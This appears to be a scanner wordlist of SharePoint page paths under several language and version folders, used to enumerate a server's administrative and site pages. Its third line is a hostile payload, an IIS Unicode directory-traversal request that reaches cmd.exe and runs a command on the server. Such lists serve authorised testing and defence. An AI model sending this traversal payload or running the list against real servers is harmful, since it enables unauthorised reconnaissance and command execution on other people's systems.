/_catalogs/masterpage/Forms/AllItems.aspx 
/_vti_bin/spsdisco.aspx
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:%5C%5C
/_layouts/1033/applyregionalsettings.aspx
/_layouts/3082/applyregionalsettings.aspx
/_layouts/1033/audience_defruleedit.aspx
/_layouts/3082/audience_defruleedit.aspx
/_layouts/1033/audience_memberlist.aspx
/_layouts/1033/categorypickerpopup.aspx
/_layouts/1033/centraldatabaselock.aspx
/_layouts/1033/confirmadvancedmode.aspx
/_layouts/1033/listsearchschedules.aspx
/_layouts/1033/siteoperationrefuse.aspx
/_layouts/3082/audience_memberlist.aspx
/_layouts/3082/categorypickerpopup.aspx
/_layouts/3082/centraldatabaselock.aspx
/_layouts/3082/confirmadvancedmode.aspx
/_layouts/3082/listsearchschedules.aspx
/_layouts/3082/siteoperationrefuse.aspx
/_layouts/1033/editdisplaymapping.aspx
/_layouts/1033/editsearchschedule.aspx
/_layouts/1033/editsearchsettings.aspx
/_layouts/1033/listcontentsources.aspx
/_layouts/1033/propertyproperties.aspx
/_layouts/3082/editdisplaymapping.aspx
/_layouts/3082/editsearchschedule.aspx
/_layouts/3082/editsearchsettings.aspx
/_layouts/3082/listcontentsources.aspx
/_layouts/3082/propertyproperties.aspx
/_layouts/1033/audience_chooser2.aspx
/_layouts/1033/lroperationstatus.aspx
/_layouts/1033/newdisplaymapping.aspx
/_layouts/3082/audience_chooser2.aspx
/_layouts/3082/lroperationstatus.aspx
/_layouts/3082/newdisplaymapping.aspx
/_layouts/1033/accessdeniedpage.aspx
/_layouts/1033/audience_chooser.aspx
/_layouts/1033/listsearchscopes.aspx
/_layouts/1033/portalproperties.aspx
/_layouts/3082/accessdeniedpage.aspx
/_layouts/3082/audience_chooser.aspx
/_layouts/3082/listsearchscopes.aspx
/_layouts/3082/portalproperties.aspx
/_layouts/1033/associateportal.aspx
/_layouts/1033/displaymappings.aspx
/_layouts/1033/dmworkspacemgmt.aspx
/_layouts/1033/newalertfromsts.aspx
/_layouts/1033/pickercontainer.aspx
/_layouts/1033/useconfirmation.aspx
/_layouts/3082/associateportal.aspx
/_layouts/3082/displaymappings.aspx
/_layouts/3082/dmworkspacemgmt.aspx
/_layouts/3082/newalertfromsts.aspx
/_layouts/3082/pickercontainer.aspx
/_layouts/3082/useconfirmation.aspx
/_layouts/1033/alertdirectory.aspx
/_layouts/1033/audience_sched.aspx
/_layouts/1033/portalsettings.aspx
/_layouts/1033/searchsettings.aspx
/_layouts/1033/speditcategory.aspx
/_layouts/3082/alertdirectory.aspx
/_layouts/3082/audience_sched.aspx
/_layouts/3082/portalsettings.aspx
/_layouts/3082/searchsettings.aspx
/_layouts/3082/speditcategory.aspx
/_layouts/1033/audience_list.aspx
/_layouts/1033/audience_edit.aspx
/_layouts/1033/audience_main.aspx
/_layouts/1033/audience_view.aspx
/_layouts/1033/htmltranslate.aspx
/_layouts/1033/personalsites.aspx
/_layouts/1033/profadminedit.aspx
/_layouts/1033/regionalsetng.aspx
/_layouts/1033/searchresults.aspx
/_layouts/1033/spcateditperm.aspx
/_layouts/1033/speditlisting.aspx
/_layouts/1033/spmovelisting.aspx
/_layouts/1033/spnewcategory.aspx
/_layouts/3082/audience_edit.aspx
/_layouts/3082/audience_main.aspx
/_layouts/3082/audience_list.aspx
/_layouts/3082/audience_view.aspx
/_layouts/3082/htmltranslate.aspx
/_layouts/3082/personalsites.aspx
/_layouts/3082/profadminedit.aspx
/_layouts/3082/regionalsetng.aspx
/_layouts/3082/searchresults.aspx
/_layouts/3082/spcateditperm.aspx
/_layouts/3082/speditlisting.aspx
/_layouts/3082/spmovelisting.aspx
/_layouts/3082/spnewcategory.aspx
/_layouts/1033/confirmalert.aspx
/_layouts/1033/confirmation.aspx
/_layouts/1033/createmysite.aspx
/_layouts/1033/editdsserver.aspx
/_layouts/1033/editproperty.aspx
/_layouts/1033/htmltrverify.aspx
/_layouts/1033/keywordbbman.aspx
/_layouts/1033/myquicklinks.aspx
/_layouts/1033/mysiteheader.aspx
/_layouts/1033/noteswizard1.aspx
/_layouts/1033/noteswizard3.aspx
/_layouts/1033/noteswizard4.aspx
/_layouts/1033/portalheader.aspx
/_layouts/1033/progresspage.aspx
/_layouts/1033/spcataddperm.aspx
/_layouts/1033/spnewlisting.aspx
/_layouts/1033/submitrepair.aspx
/_layouts/1033/templatepick.aspx
/_layouts/1033/urltranslate.aspx
/_layouts/1033/usagedetails.aspx
/_layouts/1033/noteswizard2.aspx
/_layouts/3082/confirmalert.aspx
/_layouts/3082/confirmation.aspx
/_layouts/3082/createmysite.aspx
/_layouts/3082/editdsserver.aspx
/_layouts/3082/editproperty.aspx
/_layouts/3082/htmltrverify.aspx
/_layouts/3082/keywordbbman.aspx
/_layouts/3082/myquicklinks.aspx
/_layouts/3082/mysiteheader.aspx
/_layouts/3082/noteswizard1.aspx
/_layouts/3082/noteswizard2.aspx
/_layouts/3082/noteswizard3.aspx
/_layouts/3082/noteswizard4.aspx
/_layouts/3082/portalheader.aspx
/_layouts/3082/progresspage.aspx
/_layouts/3082/spcataddperm.aspx
/_layouts/3082/spnewlisting.aspx
/_layouts/3082/submitrepair.aspx
/_layouts/3082/templatepick.aspx
/_layouts/3082/urltranslate.aspx
/_layouts/3082/usagedetails.aspx
/_layouts/1033/alertsadmin.aspx
/_layouts/1033/alertserror.aspx
/_layouts/1033/editprofile.aspx
/_layouts/1033/editsection.aspx
/_layouts/1033/htmltrredir.aspx
/_layouts/1033/listindexes.aspx
/_layouts/1033/mapproperty.aspx
/_layouts/1033/mgrdsserver.aspx
/_layouts/1033/mgrproperty.aspx
/_layouts/1033/newfiletype.aspx
/_layouts/1033/newsiterule.aspx
/_layouts/1033/publishback.aspx
/_layouts/1033/searchscope.aspx
/_layouts/1033/speditgroup.aspx
/_layouts/1033/spsviewlsts.aspx
/_layouts/1033/spsviewtype.aspx
/_layouts/1033/viewseclsts.aspx
/_layouts/3082/alertsadmin.aspx
/_layouts/3082/alertserror.aspx
/_layouts/3082/editprofile.aspx
/_layouts/3082/editsection.aspx
/_layouts/3082/htmltrredir.aspx
/_layouts/3082/listindexes.aspx
/_layouts/3082/mapproperty.aspx
/_layouts/3082/mgrdsserver.aspx
/_layouts/3082/mgrproperty.aspx
/_layouts/3082/newfiletype.aspx
/_layouts/3082/newsiterule.aspx
/_layouts/3082/publishback.aspx
/_layouts/3082/searchscope.aspx
/_layouts/3082/speditgroup.aspx
/_layouts/3082/spsviewlsts.aspx
/_layouts/3082/spsviewtype.aspx
/_layouts/3082/viewseclsts.aspx
/_layouts/1033/importdata.aspx
/_layouts/1033/logsummary.aspx
/_layouts/1033/mngsubwebs.aspx
/_layouts/1033/newcatalog.aspx
/_layouts/1033/portalview.aspx
/_layouts/1033/properties.aspx
/_layouts/1033/quicklinks.aspx
/_layouts/1033/reporthome.aspx
/_layouts/1033/selectuser.aspx
/_layouts/1033/spnewgroup.aspx
/_layouts/1033/userpicker.aspx
/_layouts/1033/webdeleted.aspx
/_layouts/3082/importdata.aspx
/_layouts/3082/logsummary.aspx
/_layouts/3082/mngsubwebs.aspx
/_layouts/3082/newcatalog.aspx
/_layouts/3082/portalview.aspx
/_layouts/3082/properties.aspx
/_layouts/3082/quicklinks.aspx
/_layouts/3082/reporthome.aspx
/_layouts/3082/selectuser.aspx
/_layouts/3082/spnewgroup.aspx
/_layouts/3082/userpicker.aspx
/_layouts/3082/webdeleted.aspx
/_layouts/1033/deleteweb.aspx
/_layouts/1033/editalert.aspx
/_layouts/1033/filetypes.aspx
/_layouts/1033/logviewer.aspx
/_layouts/1033/notesedit.aspx
/_layouts/1033/setimport.aspx
/_layouts/1033/spaddrole.aspx
/_layouts/1033/spsaclinv.aspx
/_layouts/1033/spscreate.aspx
/_layouts/3082/deleteweb.aspx
/_layouts/3082/editalert.aspx
/_layouts/3082/filetypes.aspx
/_layouts/3082/logviewer.aspx
/_layouts/3082/notesedit.aspx
/_layouts/3082/setimport.aspx
/_layouts/3082/spaddrole.aspx
/_layouts/3082/spsaclinv.aspx
/_layouts/3082/spscreate.aspx
/_layouts/1033/advsetng.aspx
/_layouts/1033/avreport.aspx
/_layouts/1033/choosecs.aspx
/_layouts/1033/copyrole.aspx
/_layouts/1033/createws.aspx
/_layouts/1033/deletemu.aspx
/_layouts/1033/dladvopt.aspx
/_layouts/1033/download.aspx
/_layouts/1033/editprms.aspx
/_layouts/1033/editrole.aspx
/_layouts/1033/htmledit.aspx
/_layouts/1033/infopage.aspx
/_layouts/1033/listedit.aspx
/_layouts/1033/lstsetng.aspx
/_layouts/1033/mcontent.aspx
/_layouts/1033/mtgredir.aspx
/_layouts/1033/myalerts.aspx
/_layouts/1033/newalert.aspx
/_layouts/1033/newsbweb.aspx
/_layouts/1033/password.aspx
/_layouts/1033/profmain.aspx
/_layouts/1033/profmngr.aspx
/_layouts/1033/redirect.aspx
/_layouts/1033/rfcxform.aspx
/_layouts/1033/rfpxform.aspx
/_layouts/1033/savetmpl.aspx
/_layouts/1033/scsignup.aspx
/_layouts/1033/setrqacc.aspx
/_layouts/1033/settings.aspx
/_layouts/1033/sitelist.aspx
/_layouts/1033/sitesubs.aspx
/_layouts/1033/siteusrs.aspx
/_layouts/1033/spcatsec.aspx
/_layouts/1033/spcontnt.aspx
/_layouts/1033/ssologon.aspx
/_layouts/1033/subchoos.aspx
/_layouts/1033/survedit.aspx
/_layouts/1033/themeweb.aspx
/_layouts/1033/toolpane.aspx
/_layouts/1033/userdisp.aspx
/_layouts/1033/useredit.aspx
/_layouts/1033/userinfo.aspx
/_layouts/1033/versions.aspx
/_layouts/1033/viewedit.aspx
/_layouts/1033/viewlsts.aspx
/_layouts/1033/viewtype.aspx
/_layouts/1033/vsubwebs.aspx
/_layouts/1033/webadmin.aspx
/_layouts/1033/workspce.aspx
/_layouts/1033/zoombldr.aspx
/_layouts/3082/advsetng.aspx
/_layouts/3082/avreport.aspx
/_layouts/3082/choosecs.aspx
/_layouts/3082/copyrole.aspx
/_layouts/3082/createws.aspx
/_layouts/3082/deletemu.aspx
/_layouts/3082/dladvopt.aspx
/_layouts/3082/download.aspx
/_layouts/3082/editprms.aspx
/_layouts/3082/editrole.aspx
/_layouts/3082/htmledit.aspx
/_layouts/3082/infopage.aspx
/_layouts/3082/listedit.aspx
/_layouts/3082/lstsetng.aspx
/_layouts/3082/mcontent.aspx
/_layouts/3082/mtgredir.aspx
/_layouts/3082/myalerts.aspx
/_layouts/3082/newalert.aspx
/_layouts/3082/newsbweb.aspx
/_layouts/3082/password.aspx
/_layouts/3082/profmain.aspx
/_layouts/3082/profmngr.aspx
/_layouts/3082/redirect.aspx
/_layouts/3082/rfcxform.aspx
/_layouts/3082/rfpxform.aspx
/_layouts/3082/savetmpl.aspx
/_layouts/3082/scsignup.aspx
/_layouts/3082/setrqacc.aspx
/_layouts/3082/settings.aspx
/_layouts/3082/sitelist.aspx
/_layouts/3082/sitesubs.aspx
/_layouts/3082/siteusrs.aspx
/_layouts/3082/spcatsec.aspx
/_layouts/3082/spcontnt.aspx
/_layouts/3082/ssologon.aspx
/_layouts/3082/subchoos.aspx
/_layouts/3082/survedit.aspx
/_layouts/3082/themeweb.aspx
/_layouts/3082/toolpane.aspx
/_layouts/3082/userdisp.aspx
/_layouts/3082/useredit.aspx
/_layouts/3082/userinfo.aspx
/_layouts/3082/versions.aspx
/_layouts/3082/viewedit.aspx
/_layouts/3082/viewlsts.aspx
/_layouts/3082/viewtype.aspx
/_layouts/3082/vsubwebs.aspx
/_layouts/3082/webadmin.aspx
/_layouts/3082/workspce.aspx
/_layouts/3082/zoombldr.aspx
/_layouts/1033/addgrp1.aspx
/_layouts/1033/addgrp2.aspx
/_layouts/1033/addrole.aspx
/_layouts/1033/allgrps.aspx
/_layouts/1033/autocat.aspx
/_layouts/1033/checkin.aspx
/_layouts/1033/conngps.aspx
/_layouts/1033/default.aspx%20
/_layouts/1033/default.aspx
/_layouts/1033/discbar.aspx
/_layouts/1033/editgrp.aspx
/_layouts/1033/fldedit.aspx
/_layouts/1033/folders.aspx
/_layouts/1033/formedt.aspx
/_layouts/1033/grpmbrs.aspx
/_layouts/1033/lstman2.aspx
/_layouts/1033/mngdisc.aspx
/_layouts/1033/profnew.aspx
/_layouts/1033/qstedit.aspx
/_layouts/1033/rcxform.aspx
/_layouts/1033/reorder.aspx
/_layouts/1033/setanon.aspx
/_layouts/1033/sitepp1.aspx
/_layouts/1033/storman.aspx
/_layouts/1033/subedit.aspx
/_layouts/1033/success.aspx
/_layouts/1033/viewnew.aspx
/_layouts/1033/webperm.aspx
/_layouts/1033/wpprevw.aspx
/_layouts/3082/addgrp1.aspx
/_layouts/3082/addgrp2.aspx
/_layouts/3082/addrole.aspx
/_layouts/3082/allgrps.aspx
/_layouts/3082/autocat.aspx
/_layouts/3082/checkin.aspx
/_layouts/3082/conngps.aspx
/_layouts/3082/default.aspx
/_layouts/3082/default.aspx%20
/_layouts/3082/discbar.aspx
/_layouts/3082/editgrp.aspx
/_layouts/3082/fldedit.aspx
/_layouts/3082/folders.aspx
/_layouts/3082/formedt.aspx
/_layouts/3082/grpmbrs.aspx
/_layouts/3082/lstman2.aspx
/_layouts/3082/mngdisc.aspx
/_layouts/3082/profnew.aspx
/_layouts/3082/qstedit.aspx
/_layouts/3082/rcxform.aspx
/_layouts/3082/reorder.aspx
/_layouts/3082/setanon.aspx
/_layouts/3082/sitepp1.aspx
/_layouts/3082/storman.aspx
/_layouts/3082/subedit.aspx
/_layouts/3082/success.aspx
/_layouts/3082/viewnew.aspx
/_layouts/3082/webperm.aspx
/_layouts/3082/wpprevw.aspx
/_layouts/1033/aclinv.aspx
/_layouts/1033/aclver.aspx
/_layouts/1033/catman.aspx
/_layouts/1033/catpp1.aspx
/_layouts/1033/create.aspx
/_layouts/1033/fldnew.aspx
/_layouts/1033/grpman.aspx
/_layouts/1033/grpsel.aspx
/_layouts/1033/iframe.aspx
/_layouts/1033/lstman.aspx
/_layouts/1033/mygrps.aspx
/_layouts/1033/mysubs.aspx
/_layouts/1033/newdwp.aspx
/_layouts/1033/newgrp.aspx
/_layouts/1033/newmws.aspx
/_layouts/1033/portal.aspx
/_layouts/1033/qstnew.aspx
/_layouts/1033/report.aspx
/_layouts/1033/reqacc.aspx
/_layouts/1033/shropt.aspx
/_layouts/1033/spanon.aspx
/_layouts/1033/subnew.aspx
/_layouts/1033/wpeula.aspx
/_layouts/3082/aclinv.aspx
/_layouts/3082/aclver.aspx
/_layouts/3082/catman.aspx
/_layouts/3082/catpp1.aspx
/_layouts/3082/create.aspx
/_layouts/3082/fldnew.aspx
/_layouts/3082/grpman.aspx
/_layouts/3082/grpsel.aspx
/_layouts/3082/iframe.aspx
/_layouts/3082/lstman.aspx
/_layouts/3082/mygrps.aspx
/_layouts/3082/mysubs.aspx
/_layouts/3082/newdwp.aspx
/_layouts/3082/newgrp.aspx
/_layouts/3082/newmws.aspx
/_layouts/3082/portal.aspx
/_layouts/3082/qstnew.aspx
/_layouts/3082/report.aspx
/_layouts/3082/reqacc.aspx
/_layouts/3082/shropt.aspx
/_layouts/3082/spanon.aspx
/_layouts/3082/subnew.aspx
/_layouts/3082/wpeula.aspx
/_layouts/1033/cspp1.aspx
/_layouts/1033/cspp2.aspx
/_layouts/1033/error.aspx
/_layouts/1033/proxy.aspx
/_layouts/1033/srman.aspx
/_layouts/1033/usage.aspx
/_layouts/3082/cspp1.aspx
/_layouts/3082/cspp2.aspx
/_layouts/3082/error.aspx
/_layouts/3082/proxy.aspx
/_layouts/3082/srman.aspx
/_layouts/3082/usage.aspx
/_layouts/1033/bpcf.aspx
/_layouts/1033/help.aspx
/_layouts/1033/role.aspx
/_layouts/1033/spcf.aspx
/_layouts/1033/user.aspx
/_layouts/3082/bpcf.aspx
/_layouts/3082/help.aspx
/_layouts/3082/role.aspx
/_layouts/3082/spcf.aspx
/_layouts/3082/user.aspx
/_layouts/1033/dws.aspx
/_layouts/1033/new.aspx
/_layouts/3082/dws.aspx
/_layouts/3082/new.aspx
/_layouts/15/applyregionalsettings.aspx
/_layouts/15/applyregionalsettings.aspx
/_layouts/15/audience_defruleedit.aspx
/_layouts/15/audience_defruleedit.aspx
/_layouts/15/audience_memberlist.aspx
/_layouts/15/categorypickerpopup.aspx
/_layouts/15/centraldatabaselock.aspx
/_layouts/15/confirmadvancedmode.aspx
/_layouts/15/listsearchschedules.aspx
/_layouts/15/siteoperationrefuse.aspx
/_layouts/15/audience_memberlist.aspx
/_layouts/15/categorypickerpopup.aspx
/_layouts/15/centraldatabaselock.aspx
/_layouts/15/confirmadvancedmode.aspx
/_layouts/15/listsearchschedules.aspx
/_layouts/15/siteoperationrefuse.aspx
/_layouts/15/editdisplaymapping.aspx
/_layouts/15/editsearchschedule.aspx
/_layouts/15/editsearchsettings.aspx
/_layouts/15/listcontentsources.aspx
/_layouts/15/propertyproperties.aspx
/_layouts/15/editdisplaymapping.aspx
/_layouts/15/editsearchschedule.aspx
/_layouts/15/editsearchsettings.aspx
/_layouts/15/listcontentsources.aspx
/_layouts/15/propertyproperties.aspx
/_layouts/15/audience_chooser2.aspx
/_layouts/15/lroperationstatus.aspx
/_layouts/15/newdisplaymapping.aspx
/_layouts/15/audience_chooser2.aspx
/_layouts/15/lroperationstatus.aspx
/_layouts/15/newdisplaymapping.aspx
/_layouts/15/accessdeniedpage.aspx
/_layouts/15/audience_chooser.aspx
/_layouts/15/listsearchscopes.aspx
/_layouts/15/portalproperties.aspx
/_layouts/15/accessdeniedpage.aspx
/_layouts/15/audience_chooser.aspx
/_layouts/15/listsearchscopes.aspx
/_layouts/15/portalproperties.aspx
/_layouts/15/associateportal.aspx
/_layouts/15/displaymappings.aspx
/_layouts/15/dmworkspacemgmt.aspx
/_layouts/15/newalertfromsts.aspx
/_layouts/15/pickercontainer.aspx
/_layouts/15/useconfirmation.aspx
/_layouts/15/associateportal.aspx
/_layouts/15/displaymappings.aspx
/_layouts/15/dmworkspacemgmt.aspx
/_layouts/15/newalertfromsts.aspx
/_layouts/15/pickercontainer.aspx
/_layouts/15/useconfirmation.aspx
/_layouts/15/alertdirectory.aspx
/_layouts/15/audience_sched.aspx
/_layouts/15/portalsettings.aspx
/_layouts/15/searchsettings.aspx
/_layouts/15/speditcategory.aspx
/_layouts/15/alertdirectory.aspx
/_layouts/15/audience_sched.aspx
/_layouts/15/portalsettings.aspx
/_layouts/15/searchsettings.aspx
/_layouts/15/speditcategory.aspx
/_layouts/15/audience_list.aspx
/_layouts/15/audience_edit.aspx
/_layouts/15/audience_main.aspx
/_layouts/15/audience_view.aspx
/_layouts/15/htmltranslate.aspx
/_layouts/15/personalsites.aspx
/_layouts/15/profadminedit.aspx
/_layouts/15/regionalsetng.aspx
/_layouts/15/searchresults.aspx
/_layouts/15/spcateditperm.aspx
/_layouts/15/speditlisting.aspx
/_layouts/15/spmovelisting.aspx
/_layouts/15/spnewcategory.aspx
/_layouts/15/audience_edit.aspx
/_layouts/15/audience_main.aspx
/_layouts/15/audience_list.aspx
/_layouts/15/audience_view.aspx
/_layouts/15/htmltranslate.aspx
/_layouts/15/personalsites.aspx
/_layouts/15/profadminedit.aspx
/_layouts/15/regionalsetng.aspx
/_layouts/15/searchresults.aspx
/_layouts/15/spcateditperm.aspx
/_layouts/15/speditlisting.aspx
/_layouts/15/spmovelisting.aspx
/_layouts/15/spnewcategory.aspx
/_layouts/15/confirmalert.aspx
/_layouts/15/confirmation.aspx
/_layouts/15/createmysite.aspx
/_layouts/15/editdsserver.aspx
/_layouts/15/editproperty.aspx
/_layouts/15/htmltrverify.aspx
/_layouts/15/keywordbbman.aspx
/_layouts/15/myquicklinks.aspx
/_layouts/15/mysiteheader.aspx
/_layouts/15/noteswizard1.aspx
/_layouts/15/noteswizard3.aspx
/_layouts/15/noteswizard4.aspx
/_layouts/15/portalheader.aspx
/_layouts/15/progresspage.aspx
/_layouts/15/spcataddperm.aspx
/_layouts/15/spnewlisting.aspx
/_layouts/15/submitrepair.aspx
/_layouts/15/templatepick.aspx
/_layouts/15/urltranslate.aspx
/_layouts/15/usagedetails.aspx
/_layouts/15/noteswizard2.aspx
/_layouts/15/confirmalert.aspx
/_layouts/15/confirmation.aspx
/_layouts/15/createmysite.aspx
/_layouts/15/editdsserver.aspx
/_layouts/15/editproperty.aspx
/_layouts/15/htmltrverify.aspx
/_layouts/15/keywordbbman.aspx
/_layouts/15/myquicklinks.aspx
/_layouts/15/mysiteheader.aspx
/_layouts/15/noteswizard1.aspx
/_layouts/15/noteswizard2.aspx
/_layouts/15/noteswizard3.aspx
/_layouts/15/noteswizard4.aspx
/_layouts/15/portalheader.aspx
/_layouts/15/progresspage.aspx
/_layouts/15/spcataddperm.aspx
/_layouts/15/spnewlisting.aspx
/_layouts/15/submitrepair.aspx
/_layouts/15/templatepick.aspx
/_layouts/15/urltranslate.aspx
/_layouts/15/usagedetails.aspx
/_layouts/15/alertsadmin.aspx
/_layouts/15/alertserror.aspx
/_layouts/15/editprofile.aspx
/_layouts/15/editsection.aspx
/_layouts/15/htmltrredir.aspx
/_layouts/15/listindexes.aspx
/_layouts/15/mapproperty.aspx
/_layouts/15/mgrdsserver.aspx
/_layouts/15/mgrproperty.aspx
/_layouts/15/newfiletype.aspx
/_layouts/15/newsiterule.aspx
/_layouts/15/publishback.aspx
/_layouts/15/searchscope.aspx
/_layouts/15/speditgroup.aspx
/_layouts/15/spsviewlsts.aspx
/_layouts/15/spsviewtype.aspx
/_layouts/15/viewseclsts.aspx
/_layouts/15/alertsadmin.aspx
/_layouts/15/alertserror.aspx
/_layouts/15/editprofile.aspx
/_layouts/15/editsection.aspx
/_layouts/15/htmltrredir.aspx
/_layouts/15/listindexes.aspx
/_layouts/15/mapproperty.aspx
/_layouts/15/mgrdsserver.aspx
/_layouts/15/mgrproperty.aspx
/_layouts/15/newfiletype.aspx
/_layouts/15/newsiterule.aspx
/_layouts/15/publishback.aspx
/_layouts/15/searchscope.aspx
/_layouts/15/speditgroup.aspx
/_layouts/15/spsviewlsts.aspx
/_layouts/15/spsviewtype.aspx
/_layouts/15/viewseclsts.aspx
/_layouts/15/importdata.aspx
/_layouts/15/logsummary.aspx
/_layouts/15/mngsubwebs.aspx
/_layouts/15/newcatalog.aspx
/_layouts/15/portalview.aspx
/_layouts/15/properties.aspx
/_layouts/15/quicklinks.aspx
/_layouts/15/reporthome.aspx
/_layouts/15/selectuser.aspx
/_layouts/15/spnewgroup.aspx
/_layouts/15/userpicker.aspx
/_layouts/15/webdeleted.aspx
/_layouts/15/importdata.aspx
/_layouts/15/logsummary.aspx
/_layouts/15/mngsubwebs.aspx
/_layouts/15/newcatalog.aspx
/_layouts/15/portalview.aspx
/_layouts/15/properties.aspx
/_layouts/15/quicklinks.aspx
/_layouts/15/reporthome.aspx
/_layouts/15/selectuser.aspx
/_layouts/15/spnewgroup.aspx
/_layouts/15/userpicker.aspx
/_layouts/15/webdeleted.aspx
/_layouts/15/deleteweb.aspx
/_layouts/15/editalert.aspx
/_layouts/15/filetypes.aspx
/_layouts/15/logviewer.aspx
/_layouts/15/notesedit.aspx
/_layouts/15/setimport.aspx
/_layouts/15/spaddrole.aspx
/_layouts/15/spsaclinv.aspx
/_layouts/15/spscreate.aspx
/_layouts/15/deleteweb.aspx
/_layouts/15/editalert.aspx
/_layouts/15/filetypes.aspx
/_layouts/15/logviewer.aspx
/_layouts/15/notesedit.aspx
/_layouts/15/setimport.aspx
/_layouts/15/spaddrole.aspx
/_layouts/15/spsaclinv.aspx
/_layouts/15/spscreate.aspx
/_layouts/15/advsetng.aspx
/_layouts/15/avreport.aspx
/_layouts/15/choosecs.aspx
/_layouts/15/copyrole.aspx
/_layouts/15/createws.aspx
/_layouts/15/deletemu.aspx
/_layouts/15/dladvopt.aspx
/_layouts/15/download.aspx
/_layouts/15/editprms.aspx
/_layouts/15/editrole.aspx
/_layouts/15/htmledit.aspx
/_layouts/15/infopage.aspx
/_layouts/15/listedit.aspx
/_layouts/15/lstsetng.aspx
/_layouts/15/mcontent.aspx
/_layouts/15/mtgredir.aspx
/_layouts/15/myalerts.aspx
/_layouts/15/newalert.aspx
/_layouts/15/newsbweb.aspx
/_layouts/15/password.aspx
/_layouts/15/profmain.aspx
/_layouts/15/profmngr.aspx
/_layouts/15/redirect.aspx
/_layouts/15/rfcxform.aspx
/_layouts/15/rfpxform.aspx
/_layouts/15/savetmpl.aspx
/_layouts/15/scsignup.aspx
/_layouts/15/setrqacc.aspx
/_layouts/15/settings.aspx
/_layouts/15/sitelist.aspx
/_layouts/15/sitesubs.aspx
/_layouts/15/siteusrs.aspx
/_layouts/15/spcatsec.aspx
/_layouts/15/spcontnt.aspx
/_layouts/15/ssologon.aspx
/_layouts/15/subchoos.aspx
/_layouts/15/survedit.aspx
/_layouts/15/themeweb.aspx
/_layouts/15/toolpane.aspx
/_layouts/15/userdisp.aspx
/_layouts/15/useredit.aspx
/_layouts/15/userinfo.aspx
/_layouts/15/versions.aspx
/_layouts/15/viewedit.aspx
/_layouts/15/viewlsts.aspx
/_layouts/15/viewtype.aspx
/_layouts/15/vsubwebs.aspx
/_layouts/15/webadmin.aspx
/_layouts/15/workspce.aspx
/_layouts/15/zoombldr.aspx
/_layouts/15/advsetng.aspx
/_layouts/15/avreport.aspx
/_layouts/15/choosecs.aspx
/_layouts/15/copyrole.aspx
/_layouts/15/createws.aspx
/_layouts/15/deletemu.aspx
/_layouts/15/dladvopt.aspx
/_layouts/15/download.aspx
/_layouts/15/editprms.aspx
/_layouts/15/editrole.aspx
/_layouts/15/htmledit.aspx
/_layouts/15/infopage.aspx
/_layouts/15/listedit.aspx
/_layouts/15/lstsetng.aspx
/_layouts/15/mcontent.aspx
/_layouts/15/mtgredir.aspx
/_layouts/15/myalerts.aspx
/_layouts/15/newalert.aspx
/_layouts/15/newsbweb.aspx
/_layouts/15/password.aspx
/_layouts/15/profmain.aspx
/_layouts/15/profmngr.aspx
/_layouts/15/redirect.aspx
/_layouts/15/rfcxform.aspx
/_layouts/15/rfpxform.aspx
/_layouts/15/savetmpl.aspx
/_layouts/15/scsignup.aspx
/_layouts/15/setrqacc.aspx
/_layouts/15/settings.aspx
/_layouts/15/sitelist.aspx
/_layouts/15/sitesubs.aspx
/_layouts/15/siteusrs.aspx
/_layouts/15/spcatsec.aspx
/_layouts/15/spcontnt.aspx
/_layouts/15/ssologon.aspx
/_layouts/15/subchoos.aspx
/_layouts/15/survedit.aspx
/_layouts/15/themeweb.aspx
/_layouts/15/toolpane.aspx
/_layouts/15/userdisp.aspx
/_layouts/15/useredit.aspx
/_layouts/15/userinfo.aspx
/_layouts/15/versions.aspx
/_layouts/15/viewedit.aspx
/_layouts/15/viewlsts.aspx
/_layouts/15/viewtype.aspx
/_layouts/15/vsubwebs.aspx
/_layouts/15/webadmin.aspx
/_layouts/15/workspce.aspx
/_layouts/15/zoombldr.aspx
/_layouts/15/addgrp1.aspx
/_layouts/15/addgrp2.aspx
/_layouts/15/addrole.aspx
/_layouts/15/allgrps.aspx
/_layouts/15/autocat.aspx
/_layouts/15/checkin.aspx
/_layouts/15/conngps.aspx
/_layouts/15/default.aspx%20
/_layouts/15/default.aspx
/_layouts/15/discbar.aspx
/_layouts/15/editgrp.aspx
/_layouts/15/fldedit.aspx
/_layouts/15/folders.aspx
/_layouts/15/formedt.aspx
/_layouts/15/grpmbrs.aspx
/_layouts/15/lstman2.aspx
/_layouts/15/mngdisc.aspx
/_layouts/15/profnew.aspx
/_layouts/15/qstedit.aspx
/_layouts/15/rcxform.aspx
/_layouts/15/reorder.aspx
/_layouts/15/setanon.aspx
/_layouts/15/sitepp1.aspx
/_layouts/15/storman.aspx
/_layouts/15/subedit.aspx
/_layouts/15/success.aspx
/_layouts/15/viewnew.aspx
/_layouts/15/webperm.aspx
/_layouts/15/wpprevw.aspx
/_layouts/15/addgrp1.aspx
/_layouts/15/addgrp2.aspx
/_layouts/15/addrole.aspx
/_layouts/15/allgrps.aspx
/_layouts/15/autocat.aspx
/_layouts/15/checkin.aspx
/_layouts/15/conngps.aspx
/_layouts/15/default.aspx
/_layouts/15/default.aspx%20
/_layouts/15/discbar.aspx
/_layouts/15/editgrp.aspx
/_layouts/15/fldedit.aspx
/_layouts/15/folders.aspx
/_layouts/15/formedt.aspx
/_layouts/15/grpmbrs.aspx
/_layouts/15/lstman2.aspx
/_layouts/15/mngdisc.aspx
/_layouts/15/profnew.aspx
/_layouts/15/qstedit.aspx
/_layouts/15/rcxform.aspx
/_layouts/15/reorder.aspx
/_layouts/15/setanon.aspx
/_layouts/15/sitepp1.aspx
/_layouts/15/storman.aspx
/_layouts/15/subedit.aspx
/_layouts/15/success.aspx
/_layouts/15/viewnew.aspx
/_layouts/15/webperm.aspx
/_layouts/15/wpprevw.aspx
/_layouts/15/aclinv.aspx
/_layouts/15/aclver.aspx
/_layouts/15/catman.aspx
/_layouts/15/catpp1.aspx
/_layouts/15/create.aspx
/_layouts/15/fldnew.aspx
/_layouts/15/grpman.aspx
/_layouts/15/grpsel.aspx
/_layouts/15/iframe.aspx
/_layouts/15/lstman.aspx
/_layouts/15/mygrps.aspx
/_layouts/15/mysubs.aspx
/_layouts/15/newdwp.aspx
/_layouts/15/newgrp.aspx
/_layouts/15/newmws.aspx
/_layouts/15/portal.aspx
/_layouts/15/qstnew.aspx
/_layouts/15/report.aspx
/_layouts/15/reqacc.aspx
/_layouts/15/shropt.aspx
/_layouts/15/spanon.aspx
/_layouts/15/subnew.aspx
/_layouts/15/wpeula.aspx
/_layouts/15/aclinv.aspx
/_layouts/15/aclver.aspx
/_layouts/15/catman.aspx
/_layouts/15/catpp1.aspx
/_layouts/15/create.aspx
